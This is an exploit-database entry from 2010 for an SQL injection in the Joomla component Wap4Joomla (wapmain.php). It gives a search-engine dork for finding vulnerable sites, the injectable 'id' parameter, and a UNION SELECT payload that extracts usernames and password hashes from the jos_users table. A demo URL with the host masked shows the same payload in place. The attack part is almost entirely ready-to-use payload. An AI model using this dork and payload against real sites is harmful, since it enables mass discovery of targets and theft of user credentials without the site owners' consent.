Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability

2010-04-28T00:00:00
ID 1337DAY-ID-12042
Type zdt
Reporter Manas58
Modified 2010-04-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================================
Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability 
=====================================================================

########################### 
       
Author    : Manas58
    
Homepage  : http://www.1923turk.com  
   
Script    : Joomla  http://www.joomlaos.de/Downloads/Joomla_und_Mambo_Komponenten/Wap4Joomla.html
   
Download  : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,2088.html 
 
Dork      : inurl:wapmain.php?option=     
###########################   
         
[ Vulnerable File ]
  
     
wap/wapmain.php?option=onews&action=link&id= [ SQL ] 
          
     
[ XpL ] 
       
-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
   
[ Demo]
  
http://xxxxx/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--



#  0day.today [2018-04-05]  #